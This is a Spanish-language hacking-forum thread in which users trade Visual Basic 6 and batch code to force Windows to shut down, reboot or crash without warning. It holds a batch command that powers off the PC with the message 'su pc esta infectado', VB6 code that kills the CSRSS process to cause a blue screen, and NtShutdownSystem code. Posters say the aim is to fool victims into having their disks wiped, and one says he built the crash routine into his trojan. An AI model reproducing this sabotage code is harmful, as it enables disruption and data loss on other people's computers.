Envio archivo zip con código fuente en VB6 para apagar o reiniciar el PC sin previo aviso.
Ningún programa prodra avisar ke el sistema se esta cerrando.
Este programa usa las API de Windows LookupPrivilegeValue, AdjustTokenPrivileges y DisableAllPrivileges
Atte. The_Cracker
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
MS-DOS

@echo off
shutdown -s -t 01 -c "su pc esta infectado"
exit

A SI TAMBIEN APAGA EL PC NO? Y ES MAS FACIL.

SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
Dr_HaCk93 escribió:MS-DOS
@echo off
shutdown -s -t 01 -c "su pc esta infectado"
exit

A SI TAMBIEN APAGA EL PC NO? Y ES MAS FACIL.
SALUDOS!!
No vi el source de The_Cracker, pero esta diciendo que no hay previo aviso ni nada, en batch sale una ventanita que dice que se va a apagar el sistema (y mas se nota si le agregas el parametro de -t 01), entonces el usuario si sabe medianamente algo de windows, se va a dar cuenta rapidamente que es ese el problema y lo va a solucionar muy facilmente.

En cambio si no tiene ningun tipo de aviso, es probable que el usuario crea que es un problema de windows y lleve la computadora al tecnico, y el tecnico lo mas normal que va a ser es formatearla (sin ofender a los tecnicos, pero es lo unico que hacen), perdiendo asi casi toda la informacion del disco duro.
Imagen
Bueno, esta solucionado peeeero.... siempre hay algo mejor que aportar no???
Vi el título del post y me pareció mal no hacer mención al gran programador Karcrack que ya en su día hizo en visual basic una función que es la que mas rapido reinicia el PC bruscamente.... mas que nada porque hace un BSOD

Aqui tienes el link:
[Enlace externo eliminado para invitados]

Una BSOD es una pantalla azul de error por si no me entendiste aunque seguro que la habrás visto
Imagen
Gracias por mencionarme Raulrl...

He hecho una version, mas cortita

Código: Seleccionar todo

Option Explicit

'NTDLL
Private Declare Function CsrGetProcessId Lib "NTDLL" () As Long
Private Declare Function RtlAdjustPrivilege Lib "NTDLL" (ByVal Privilege As Long, ByVal Enable As Long, ByVal Client As Long, WasEnabled As Long) As Long
'KERNEL32
Private Declare Function OpenProcess Lib "KERNEL32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

Public Sub CrashWindows()
    Call RtlAdjustPrivilege(ByVal 20&, 1, 0, 0)
    Call TerminateProcess(OpenProcess(&H1F0FFF, 0&, CsrGetProcessId), 0&)
End Sub
Imagen
este es mas corto :

Código: Seleccionar todo

Public Declare Function RtlAdjustPrivilege& Lib "ntdll" (ByVal Privilege&, ByVal NewValue&, ByVal NewThread&, OldValue&)
Public Declare Function NtShutdownSystem& Lib "ntdll" (ByVal ShutdownAction&)

Public Const SE_SHUTDOWN_PRIVILEGE& = 19
Public Const SHUTDOWN& = 0
Public Const RESTART& = 1
Public Const POWEROFF& = 2

Sub Main()

RtlAdjustPrivilege SE_SHUTDOWN_PRIVILEGE, 1, 0, 0
NtShutdownSystem SHUTDOWN '

End Sub
funciona muy bien y con otras Apis ,saludos!
http://www.freundt-esta-aburrido.blogspot.com
al-hacker, tu codigo reinicia el pc pero el de Karcrack produce un BSOD cosas distintas yo implementé a mi troyano esta función (tranquilo Karcrack que tienes credito )

Saludos
Imagen
jaja si, muy buenas, hay un metodo que lei de microsoft para producir un BSOD agregando una clave al registro y despues presionando una convinacion de teclas, ahora no me acuerdo cual era la clave ni la convinacion de teclas pero era bien facil :)
Imagen
Responder

Volver a “VB/.NET”